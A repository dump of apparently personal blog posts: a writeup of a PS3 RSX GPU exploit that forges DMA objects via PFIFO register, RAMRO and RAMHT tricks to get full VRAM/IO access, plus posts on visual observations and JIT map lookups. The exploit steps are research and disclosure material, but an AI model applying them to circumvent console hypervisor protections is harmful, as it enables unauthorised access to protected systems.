 82 | * `0x002210` *NV03_PFIFO_RAMHT*: Controls the size and RAMIN offset of RAMHT.
 83 | * `0x002218` *NV03_PFIFO_RAMRO*: Controls the size and RAMIN offset of RAMRO.
 84 | * `0x002504` *NV04_PFIFO_MODE*: Alternate between PIO and DMA mode in channels.
 85 | 
 86 | These register fields are described in detail in [nv1_pfifo.xml](https://github.com/envytools/envytools/blob/master/rnndb/fifo/nv1_pfifo.xml). CellOS-LV1 sets RAMHT at RAMIN offset `0x10000` with 16 KB in size and RAMRO at RAMIN offset `0x18000` with 512 bytes in size.
 87 | 
 88 | ### RAMHT manipulation attempt
 89 | 
 90 | Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT to reinterpret other byte sequences as valid entries. According to the information above, RAMHT can only be relocated in the range *0x0* to *0x1F000* and must have an alignment of 4 KB. In order to get a valid RAMHT entry pointing to our VRAM area, we need to find an 8-byte sequence satisfying:
 91 | 
 92 | 1. Reinterpreting the bits 31:23 (MSB:LSB) of the second word is equal to 1 (i.e. our application's PFIFO channel).  
 93 | 2. Reinterpreting the bits 19:0 (MSB:LSB) of the second word is a value in range `[0x20000-0xFFFFF]` (mappable VRAM).
 94 | 3. Calculating the RAMHT offset minus the entry offset results in a multiple of 4 KB.
 95 | 
 96 | These conditions are hard to satisfy and aside from unlikely random values that might have been written during memtest, they will not be found in this range.
 97 | 
 98 | ### RAMRO as RAMHT entry generator
 99 | 
100 | However, there is still a way to get such entries in RAMHT. RAMRO can only be relocated in the range *0x0* to *0x1FE00* and must have an alignment of 512 bytes. The submission of invalid PFIFO commands causes 8-byte writes in RAMRO, in which the first word holds the error report and the second word the submitted argument. We can control the argument and predict the error report, thus being able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT, we should ensure that no existing entry is overwritten:
101 | 
102 | 1. Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }.
103 | 2. Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }.
104 | 3. Their corresponding RAMHT offsets for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }.
105 | 
106 | After computing the RAMHT offsets for all pairs consisting of any handle ever created by the LV1 driver and any possible channel ID (up to the maximum of 4 that LV1 supports), we know that no handle will ever be placed by the driver in the RAMHT range `0xC00` - `0xCFF` (note that `0xC00` is 512-byte aligned). Therefore RAMRO could be moved inside RAMHT without fearing a collision.
107 | 
108 | ### Accessing custom DMA objects
109 | 
110 | The reserved VRAM for `vsh.self` (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.:
111 | 
112 | ```cpp
113 | 0x00808000 == (1 /*Channel ID*/ << 23) | (0x800000 /*RAMIN offset at 8 MB*/ >> 4)
114 | ```
115 | 
116 | The only remaining step is placing our custom DMA object in that offset. Finally a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range:
117 | 
118 | * `0x0060` *NV406E_SET_CONTEXT_DMA_SEMAPHORE*: Set DMA object handle (i.e. the `0x504010XX` reports above) 
119 | * `0x0064` *NV406E_SEMAPHORE_OFFSET*: Set the offset we want to write in.
120 | * `0x006C` *NV406E_SEMAPHORE_RELEASE*: Write the specified value there.
121 | 
122 | If the specified value ends up at said offset in the range specified by our DMA object, the exploit has succeeded.
123 | 


--------------------------------------------------------------------------------
/posts/2016-03-16-ps3-gpu-exploit/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>PS3 GPU Full VRAM/IO access exploit</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>PS3 GPU Full VRAM/IO access exploit</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2016-03-16</span>
 72 |             </p>
 73 |             <h2 id="introduction">Introduction</h2>
 74 | <p>During the early development of the PlayStation 3 emulator project <a href="https://github.com/AlexAltea/nucleus">Nucleus</a>, it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to <em>LV2</em>. This implied reverse engineering and reimplementing the kernel, and intercept the syscalls used by the user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix <code>sys_rsx</code>, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper of the actual hypervisor-level RSX driver, accessible through the <code>lv1_gpu</code> syscalls.</p>
 75 | <p>Between February 2016 and March 2016, the developer <em>@3141card</em> reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the <a href="https://github.com/envytools/envytools">Envytools</a>/<a href="https://nouveau.freedesktop.org">Nouveau</a> projects and advice from <em>@mwk</em> eased the security analysis, resulting in the vulnerability presented here.</p>
 76 | <h2 id="reality-synthesizer">Reality Synthesizer</h2>
 77 | <p>The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. RSX exposes 3 Base Address Registers (BARs):</p>
 78 | <table>
 79 | <thead>
 80 | <tr>
 81 | <th>BAR</th>
 82 | <th>Offset</th>
 83 | <th>Size</th>
 84 | <th>Description</th>
 85 | </tr>
 86 | </thead>
 87 | <tbody>
 88 | <tr>
 89 | <td><em>BAR0</em></td>
 90 | <td><code>0x28000000000</code></td>
 91 | <td>32 MB</td>
 92 | <td>MMIO</td>
 93 | </tr>
 94 | <tr>
 95 | <td><em>BAR1</em></td>
 96 | <td><code>0x28080000000</code></td>
 97 | <td>256 MB</td>
 98 | <td>VRAM</td>
 99 | </tr>
100 | <tr>
101 | <td><em>BAR2</em></td>
102 | <td><code>0x28002000000</code></td>
103 | <td><em>???</em></td>
104 | <td>RAMIN</td>
105 | </tr>
106 | </tbody>
107 | </table>
108 | <p>While <em>BAR0</em> points to the MMIO register area, both <em>BAR1</em> and <em>BAR2</em> map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. Following formulas can be used to convert a BAR1 offset into a BAR2 offset and vice-versa:</p>
109 | <div class="codehilite"><pre><span></span><span class="kt">uint32_t</span> <span class="nf">addr_vram_to_pramin</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">offset</span><span class="p">)</span> <span class="p">{</span>
110 |     <span class="kt">uint32_t</span> <span class="n">vram_size</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span> <span class="c1">// 256 MB</span>
111 |     <span class="kt">uint32_t</span> <span class="n">rev_size</span> <span class="o">=</span> <span class="mh">0x80000</span><span class="p">;</span> <span class="c1">// 512 KB</span>
112 |     <span class="k">return</span> <span class="p">(</span><span class="n">offset</span> <span class="o">-</span> <span class="n">vram_size</span><span class="p">)</span> <span class="o">^</span> <span class="o">-</span><span class="n">rev_size</span><span class="p">;</span>
113 | <span class="p">}</span>
114 | 
115 | <span class="kt">uint32_t</span> <span class="nf">addr_ramin_to_vram</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">offset</span><span class="p">)</span> <span class="p">{</span>
116 |     <span class="kt">uint32_t</span> <span class="n">vram_size</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span> <span class="c1">// 256 MB</span>
117 |     <span class="kt">uint32_t</span> <span class="n">rev_size</span> <span class="o">=</span> <span class="mh">0x80000</span><span class="p">;</span> <span class="c1">// 512 KB</span>
118 |     <span class="k">return</span> <span class="n">vram_size</span> <span class="o">-</span> <span class="p">(</span><span class="n">offset</span> <span class="o">-</span> <span class="p">(</span><span class="n">offset</span> <span class="o">%</span> <span class="n">rev_size</span><span class="p">))</span> <span class="o">-</span> <span class="n">rev_size</span> <span class="o">+</span> <span class="p">(</span><span class="n">offset</span> <span class="o">%</span> <span class="n">rev_size</span><span class="p">);</span>
119 | <span class="p">}</span>
120 | </pre></div>
121 | 
122 | 
123 | <p>The driver fills RAMIN with objects which can be either <em>Engine objects</em> or <em>DMA objects</em>, commonly known as <em>FIFO objects</em>. The first kind describe engines that do a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.) the latter describe a DMA-accessible location.</p>
124 | <p>Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates hash-table known as <em>RAMHT</em>  which maps a unique handler to the RAMIN offset where the target DMA object is located.</p>
125 | <p>The DMA objects contain information about the access type, the range size and starting offset. Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets:</p>
126 | <table>
127 | <thead>
128 | <tr>
129 | <th>Offset</th>
130 | <th>Description</th>
131 | </tr>
132 | </thead>
133 | <tbody>
134 | <tr>
135 | <td><code>0x00000000</code> - <code>0x0FFFFFFF</code></td>
136 | <td>VRAM</td>
137 | </tr>
138 | <tr>
139 | <td><code>0x80000000</code> - <code>0x8FFFFFFF</code></td>
140 | <td>IOMMU (Context 0)</td>
141 | </tr>
142 | <tr>
143 | <td><code>0x90000000</code> - <code>0x9FFFFFFF</code></td>
144 | <td>IOMMU (Context 1)</td>
145 | </tr>
146 | </tbody>
147 | </table>
148 | <h2 id="exploit">Exploit</h2>
149 | <h3 id="rsx-mmio-register-mapping">RSX MMIO register mapping</h3>
150 | <p>The LV2 kernel provides the following syscall:</p>
151 | <div class="codehilite"><pre><span></span><span class="c1">// LV2 SysCall 675 (0x2A3)</span>
152 | <span class="kt">uint64_t</span> <span class="nf">sys_rsx_device_map</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">mmio_addr</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">vram_addr</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">device_id</span><span class="p">);</span>
153 | </pre></div>
154 | 
155 | 
156 | <p>The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability:</p>
157 | <table>
158 | <thead>
159 | <tr>
160 | <th>Device</th>
161 | <th>MMIO</th>
162 | <th>VRAM</th>
163 | <th>Description</th>
164 | <th>Control</th>
165 | </tr>
166 | </thead>
167 | <tbody>
168 | <tr>
169 | <td>5</td>
170 | <td><code>0x08A000</code></td>
171 | <td><code>----------</code></td>
172 | <td></td>
173 | <td>No</td>
174 | </tr>
175 | <tr>
176 | <td>6</td>
177 | <td><code>0x200000</code></td>
178 | <td><code>----------</code></td>
179 | <td>PMEDIA</td>
180 | <td>No</td>
181 | </tr>
182 | <tr>
183 | <td>7</td>
184 | <td><code>0x600000</code></td>
185 | <td><code>----------</code></td>
186 | <td>PCRTC</td>
187 | <td>No</td>
188 | </tr>
189 | <tr>
190 | <td>8</td>
191 | <td><code>--------</code></td>
192 | <td><code>0x0FF10000</code></td>
193 | <td></td>
194 | <td>No</td>
195 | </tr>
196 | <tr>
197 | <td>9</td>
198 | <td><code>0x400000</code></td>
199 | <td><code>----------</code></td>
200 | <td>PGRAPH</td>
201 | <td>Yes</td>
202 | </tr>
203 | <tr>
204 | <td>10</td>
205 | <td><code>0x100000</code></td>
206 | <td><code>----------</code></td>
207 | <td>PFB</td>
208 | <td>Yes</td>
209 | </tr>
210 | <tr>
211 | <td>11</td>
212 | <td><code>0x00A000</code></td>
213 | <td><code>----------</code></td>
214 | <td>PCOUNTER</td>
215 | <td>Yes</td>
216 | </tr>
217 | <tr>
218 | <td>12</td>
219 | <td><code>0x680000</code></td>
220 | <td><code>----------</code></td>
221 | <td></td>
222 | <td>Yes</td>
223 | </tr>
224 | <tr>
225 | <td>13</td>
226 | <td><code>0x090000</code></td>
227 | <td><code>----------</code></td>
228 | <td></td>
229 | <td>Yes</td>
230 | </tr>
231 | <tr>
232 | <td><strong>14</strong></td>
233 | <td><strong><code>0x002000</code></strong></td>
234 | <td><strong><code>----------</code></strong></td>
235 | <td><strong>PFIFO</strong></td>
236 | <td><strong>Yes</strong></td>
237 | </tr>
238 | <tr>
239 | <td>15</td>
240 | <td><code>0x088000</code></td>
241 | <td><code>----------</code></td>
242 | <td>IOIF</td>
243 | <td>Yes</td>
244 | </tr>
245 | </tbody>
246 | </table>
247 | <p>By mapping the device 14, we can access the PFIFO MMIO registers from the userland code (or LV2 if <code>ss.param.fself.control</code> prevents from doing that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some of them struck as particularly dangerous if misused. These registers are described below:</p>
248 | <ul>
249 | <li><code>0x002140</code> <em>NV03_PFIFO_INTR_EN_0</em>: Disable the interrupts that trigger LV1 panics.</li>
250 | <li><code>0x002210</code> <em>NV03_PFIFO_RAMHT</em>: Controls the size and RAMIN offset of RAMHT.</li>
251 | <li><code>0x002218</code> <em>NV03_PFIFO_RAMRO</em>: Controls the size and RAMIN offset of RAMRO.</li>
252 | <li><code>0x002504</code> <em>NV04_PFIFO_MODE</em>: Alternate between PIO and DMA mode in channels.</li>
253 | </ul>
254 | <p>These register fields are described in detail here in <a href="https://github.com/envytools/envytools/blob/master/rnndb/fifo/nv1_pfifo.xml">nv1_pfifo.xml</a>. CellOS-LV1 sets RAMHT at RAMIN offset <code>0x10000</code> and a 16 KB uin size and RAMRO at RAMIN offset <code>0x18000</code> with 512 bytes in size.</p>
255 | <h3 id="ramht-manipulation-attempt">RAMHT manipulation attempt</h3>
256 | <p>Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT to reinterpret other byte sequences as valid entries. By the information before, RAMHT can only be relocated in the range <em>0x0</em> to <em>0x1F000</em> and have an alignment of 4 KB. In order to get a valid RAMHT entry poiting to our VRAM area, we need to find 8 byte sequence satisfying:</p>
257 | <ol>
258 | <li>Reinterpreting the bits 31:23 (MSB:LSB) of the second word is equal to 1 (i.e. our application's PFIFO channel).  </li>
259 | <li>Reinterpreting the bits 19:0 (MSB:LSB) of the second word is a value in range <code>[0x20000-0xFFFFF]</code> (mappable VRAM).</li>
260 | <li>Calculating the RAMHT offset minus the entry offset results in a multiple of 4 KB.</li>
261 | </ol>
262 | <p>These conditions are hard to satisfy and aside from unlikely random values that might have been written during memtest, they will not be found in this range.</p>
263 | <h3 id="ramro-as-ramht-entry-generator">RAMRO as RAMHT entry generator</h3>
264 | <p>However, there is still a way to get such entries in RAMHT. RAMRO can only be relocated in the range <em>0x0</em> to <em>0x1FE00</em> and have an alignment of 512 byte. The submission of invalid PFIFO commands causes 8 byte writes in RAMRO in which the first word holds the error report and the second word the submitted argument. We can control the argument and predict the error report, thus being able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT we should ensure that no existing entry is overwritten:</p>
265 | <ol>
266 | <li>Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }.</li>
267 | <li>Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }.</li>
268 | <li>Their corresponding RAMHT offset for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }.</li>
269 | </ol>
270 | <p>After computing the RAMHT offsets for all pairs consisting of any handles ever created by the LV1 driver and any possible channels ID (up to the maximum of 4 that LV1 supports), we know that no handle will ever be placed by the driver in the RAMHT range <code>0xC00</code> - <code>0xCFF</code> (note that <code>0xC00</code> is 512 byte aligned). Threfore RAMRO could be moved inside RAMHT without fearing a collision.</p>
271 | <h3 id="accessing-custom-dma-objects">Accessing custom DMA objects</h3>
272 | <p>The reserved VRAM for <code>vsh.self</code> (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.:</p>
273 | <div class="codehilite"><pre><span></span><span class="mh">0x00808000</span> <span class="o">==</span> <span class="p">(</span><span class="mi">1</span> <span class="cm">/*Channel ID*/</span> <span class="o">&lt;&lt;</span> <span class="mi">23</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="mh">0x800000</span> <span class="cm">/*RAMIN offset at 8 MB*/</span> <span class="o">&gt;&gt;</span> <span class="mi">4</span><span class="p">)</span>
274 | </pre></div>
275 | 
276 | 
277 | <p>The only remaining step is placing our custom DMA object in that offset. Finally a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range:</p>
278 | <ul>
279 | <li><code>0x0060</code> <em>NV406E_SET_CONTEXT_DMA_SEMAPHORE</em>: Set DMA object handle (i.e. the <code>0x504010XX</code> reports above) </li>
280 | <li><code>0x0064</code> <em>NV406E_SEMAPHORE_OFFSET</em>: Set the offset we want to write in.</li>
281 | <li><code>0x006C</code> <em>NV406E_SEMAPHORE_RELEASE</em>: Write the specified value there.</li>
282 | </ul>
283 | <p>If the specified value ends up at said offset in the range specified by our DMA object the exploit succeeded.</p>
284 |         </article>
285 |         <hr>
286 |         <footer>
287 |             <p>
288 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
289 |             </p>
290 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
291 |         </footer>
292 |     </body>
293 | </html>
294 | 


--------------------------------------------------------------------------------
/posts/2016-08-22-observations/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: live
 3 | date: 2016-08-22
 4 | title: Observations
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me.
 9 | 
10 | ## Light
11 | 
12 | * When observing a blacklight or UV-A light, i.e. one of these blue/purple-ish lamps that make white and fluorescent objects especially bright, my eyes disagree on the perceived light. From my point of view: My left eye shows it blurry, as if it couldn't focus on the light source and with a slightly darker-blue hue. My right eye can focus correctly on the light source, but perceives it with a slightly brighter-purple color.
13 | 
14 | * Doing fast eye movements while keeping an LED-based white light in my field of view makes the light be perceived as separate red-green-blue components at different positions. Why does this happen?
15 | 
16 | * When firing small handheld lasers, one can perceive a fine-grained pattern of dots where the beam hits. Any small translation or rotation of the laser diode seems to completely change this pattern. Since involuntary movements are hard to avoid, the resulting effect looks like video noise. Why does this happen?
17 | 
18 | 
19 | ## Climate
20 | 
21 | * As suggested by the *clathrate gun hypothesis* [1], the rise in global temperatures will cause, or is causing, vast amounts of methane gas to be released into the atmosphere. The impact of methane gas is more than 25 times higher than that of carbon dioxide [2], thus resulting in devastating consequences for the whole planet. Burning methane corresponds to the reaction: CH4 + 2 O2 -> CO2 + 2 H2O. Question: Assuming the chain reaction has already started and is inevitable, why don't we burn the methane deposits under the Siberian permafrost?
22 |     1. https://en.wikipedia.org/wiki/Clathrate_gun_hypothesis
23 |     2. https://www3.epa.gov/climatechange/ghgemissions/gases/ch4.html
24 | 


--------------------------------------------------------------------------------
/posts/2016-08-22-observations/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>Observations</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>Observations</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2016-08-22</span>
 72 |             </p>
 73 |             <p>Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me.</p>
 74 | <h2 id="light">Light</h2>
 75 | <ul>
 76 | <li>
 77 | <p>When observing a blacklight or UV-A light, i.e. one of these blue/purple-ish lamps that make white and fluorescent objects specially bright, my eyes disagree on the perceived light. From my point of view: My left eye shows it blurry, as if it couldn't focus on the light source and with a slightly darker-blue hue. My right eye can focuses correctly on the light source, but perceives it with a slightly brighter-purple color.</p>
 78 | </li>
 79 | <li>
 80 | <p>Doing fast eye movements while keeping a LED-based white light in my field of view, makes the light be perceived as separate red-green-blue components at different positions. Why does this happen?</p>
 81 | </li>
 82 | <li>
 83 | <p>When firing small handheld lasers, one can perceive a fine-grained pattern of dots where the beam hits. Any small translation or rotation of the laser diode seem to completely change this pattern. Since involuntary movements are hard to avoid the resulting effect looks like video noise. Why does this happen?</p>
 84 | </li>
 85 | </ul>
 86 | <h2 id="climate">Climate</h2>
 87 | <ul>
 88 | <li>Suggested by the <em>clathrate gun hypothesis</em> [1], the rise in global temperatures will cause, or is causing, vast amounts of methane gas to be released to the athmosphere. The impact of methane gas is more than 25 times higher than carbon dioxide [2], thus resulting in devastating consequences for the whole planet. The burning methane corresponds to the reaction: CH4 + 2 O2 -&gt; CO2 + 2 H2O. Question: Assuming the chain reaction has already started and is inevitable, why don't we burn the methane deposits under the siberian permafrost?<ol>
 89 | <li>https://en.wikipedia.org/wiki/Clathrate_gun_hypothesis</li>
 90 | <li>https://www3.epa.gov/climatechange/ghgemissions/gases/ch4.html</li>
 91 | </ol>
 92 | </li>
 93 | </ul>
 94 |         </article>
 95 |         <hr>
 96 |         <footer>
 97 |             <p>
 98 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
 99 |             </p>
100 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
101 |         </footer>
102 |     </body>
103 | </html>
104 | 


--------------------------------------------------------------------------------
/posts/2016-09-14-jit-compiled-maps/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: post
 3 | date: 2016-09-07
 4 | title: Fast lookups in JIT-compiled maps
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data.
 9 | 
10 | ## Background
11 | 
12 | Some time ago, I reimplemented the [RSX GPU](https://en.wikipedia.org/wiki/RSX_%27Reality_Synthesizer%27) command processor in the emulator, [Nucleus](https://github.com/AlexAltea/nucleus). This GPU is made of several engines, each bound at a specific index (*0*-*7*) of the command processor, and each index provides a MMIO register window (*0x0*-*0x1FFC*). Commands are 16-bit bitfields containing an index (3-bit) and MMIO offset (13-bit). Since recent userland drivers always bound engines to the same indices and there was a limited number of valid MMIO offsets, our command processor was just a big hardcoded *switch-case* mapping commands to the corresponding emulator function.
13 | 
14 | However, older or custom drivers might bind engines at different indices, making our compile-time *switch-case* useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands could have made this impossible. Since lookup times are critical, this raises the question, **what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime?** Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time?
15 | 
16 | Jitter solves this by letting the compiler decide that.
17 | 
18 | ---
19 | 
20 | __TODO: More information soon.__
21 | 


--------------------------------------------------------------------------------
/posts/2016-09-14-jit-compiled-maps/index.html:
--------------------------------------------------------------------------------
 1 | <!-- This file has been auto-generated! -->
 2 | <!DOCTYPE html>
 3 | <html>
 4 |     <head>
 5 |         <meta charset="utf-8">
 6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
 7 |         <title>Fast lookups in JIT-compiled maps</title>
 8 |         <!-- Style -->
 9 |         <link rel="stylesheet" href="../../css/code.css">
10 |         <link rel="stylesheet" href="../../css/markdown.css">
11 |         <style>
12 |             body {
13 |                 box-sizing: border-box;
14 |                 min-width: 200px;
15 |                 max-width: 980px;
16 |                 margin: 0 auto;
17 |                 padding: 45px;
18 |             }
19 | 
20 |             header {
21 |                 position: relative;
22 |             }
23 |             header > .links {
24 |                 position: absolute;
25 |                 right: 0;
26 |             }
27 | 
28 |             .post-key {
29 |                 background-color: hsl(45, 67%, 80%);
30 |                 border-radius: 5px 0px 0px 5px;
31 |                 padding: 2px 6px 2px 8px;
32 |                 margin: 0px;
33 |             }
34 |             .post-val {
35 |                 background-color: hsl(45, 67%, 90%);
36 |                 border-radius: 0px 5px 5px 0px;
37 |                 padding: 2px 8px 2px 6px;
38 |                 margin: 0px;
39 |             }
40 | 
41 |             footer {
42 |                 text-align: center;
43 |             }
44 |         
45 |             @media (max-width: 767px) {
46 |                 body {
47 |                     padding: 15px;
48 |                 }
49 |             }
50 |         </style>
51 |     </head>
52 |     <body class="markdown-body">
53 |         <header>
54 |             <div class="links">
55 |                 <span>
56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
57 |                     <a href="https://github.com/AlexAltea">Github</a> |
58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
59 |                 </span>
60 |             </div>
61 |             <span><a href="../../">&lt; Other articles</a></span>
62 |         </header>
63 |         <article>
64 |             <h1>Fast lookups in JIT-compiled maps</h1>
65 |             <p>
66 |                 <span 
67 |                     class="post-key">Author</span><span
68 |                     class="post-val">Alexandro Sanchez</span>
69 |                 <span
70 |                     class="post-key">Date</span><span
71 |                     class="post-val">2016-09-07</span>
72 |             </p>
73 |             <p>This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data.</p>
74 | <h2 id="background">Background</h2>
75 | <p>Some time ago, I reimplemented the <a href="https://en.wikipedia.org/wiki/RSX_%27Reality_Synthesizer%27">RSX GPU</a> command processor in the emulator, <a href="https://github.com/AlexAltea/nucleus">Nucleus</a>. This GPU is made of several engines, each bound at a specific index (<em>0</em>-<em>7</em>) of the command processor, and each index provides a MMIO register window (<em>0x0</em>-<em>0x1FFC</em>). Commands are 16-bit bitfields containing an index (3-bit) and MMIO offset (13-bit). Recent userland drivers always bound engines to the same indices and there was a limited number valid MMIO offsets, our command processor was just a big hardcoded <em>switch-case</em> mapping commands to corresponding emulator function.</p>
76 | <p>However, older or custom drivers might bind engines at different indices making our compile-time <em>switch-case</em> useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands could have made this impossible. Since lookup times are critical, this yields the question, <strong>what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime?</strong> Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time?</p>
77 | <p>Jitter solves this by letting the compiler decide that.</p>
78 | <hr>
79 | <p><strong>TODO: More information soon.</strong></p>
80 |         </article>
81 |         <hr>
82 |         <footer>
83 |             <p>
84 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
85 |             </p>
86 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
87 |         </footer>
88 |     </body>
89 | </html>
90 | 


